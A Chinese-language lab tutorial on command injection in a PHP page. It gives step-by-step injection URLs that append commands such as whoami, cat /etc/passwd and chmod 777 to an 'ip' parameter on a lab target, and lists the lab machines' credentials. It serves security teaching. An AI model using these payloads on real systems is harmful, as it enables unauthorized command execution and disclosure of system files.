實驗目的
了解命令執行漏洞的危害
實驗原理
由於開發人員編寫源碼,沒有針對代碼中可執行的特殊函數入口做過濾,導致客戶端可以提交惡意構造語句提交,並交由服務器端執行。命令注入攻擊中WEB服務器沒有過濾類似system(),eval(),exec()等函數是該漏洞攻擊成功的最主要原因。
實驗內容
命令注入攻擊中WEB服務器沒有過濾類似system(),eval(),exec()等函數使得攻擊成功
實驗環境描述
1、靶機 用戶名密碼為:root toor
2、滲透機 用戶名密碼為:admin 123456
實驗步驟
1、在靶機上輸入ifconfig查看靶機地址(請自行修改ip地址,確保實驗可以做通)
2、在攻擊機win7的瀏覽器中輸入靶機地址192.168.10.117/index.php
3、找到 Commands injection ,點擊Example1進入命令注入環境第一的實例
4、在攻擊機瀏覽器中輸入http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 && pwd發現並沒有什么變化
5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 pwd將&&進行編碼,顯示了當前路徑
漏洞利用
1、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 whoami進行whoami查詢
2、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 net start,通過命令注入攻擊查看web服務器開啟了哪些服務
3、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 cat /etc/passwd,顯示當前有哪些用戶。
4、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看當前目錄下所有可見文件的詳細屬性
5、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 chmod 777 examplel.php ,修改examplel.php文件的權限為文件所在的組和其他用戶是可讀可寫可執行。
6、http://192.168.10.117/commandexec/example1.php?ip=127.0.0.1 %26%26 ls -l查看當前目錄下所有可見文件的詳細屬性,examplel.php的文件權限已經被修改了。